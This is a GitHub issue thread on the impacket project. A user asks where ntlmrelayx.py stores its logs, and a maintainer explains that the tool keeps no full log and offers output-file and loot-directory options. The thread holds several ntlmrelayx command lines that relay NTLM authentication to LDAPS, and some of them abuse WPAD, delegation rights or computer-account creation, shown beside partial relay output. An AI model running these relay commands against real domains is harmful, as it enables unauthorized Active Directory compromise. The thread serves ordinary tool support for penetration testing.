### ISSUE TITLE
Where i can find ntlmrelax last ran stored logs files  

### ISSUE THREAD

**Issue by rejon77** [SecureAuthCorp/impacket#831]
Can some one help me where can i find the last log files or db for ntlmrelax in impacket.
I ran like this; 
kali@***:~/impacket$ sudo ntlmrelayx.py -t ldaps://example.com --add-computer

[*] HTTPD: Client requested path: http://*****************/configuration/getagentserverinfo
[*] HTTPD: Received connection from 10.1.**.**, but there are no more targets left!
[*] HTTPD: Received connection from 10.1.**.**, attacking target ldaps://example.com

So, where i can find this log stored?

**Comment by asolino** [comment]
Hey @rejon77 

`ntlmrelayx.py` does not store all its output in a log. You can use `-output-file-` or `-loot-dir` to achieve a subset of the full output.

**Comment by rejon77** [comment]
i haven't seen any output file after ran -i and -of command 
kali@kali:~/impacket$ sudo ntlmrelayx.py -t ldaps://example.com -wh attacker-wpad --delegate-access -l /home/kali/tmp/New.txt

kali@kali:~/impacket$ sudo ntlmrelayx.py -t ldaps://example.com -wh attacker-wpad --delegate-access -of /home/kali/tmp/New.txt

**Comment by exfiltrate** [comment]
no logs by default pretty aids
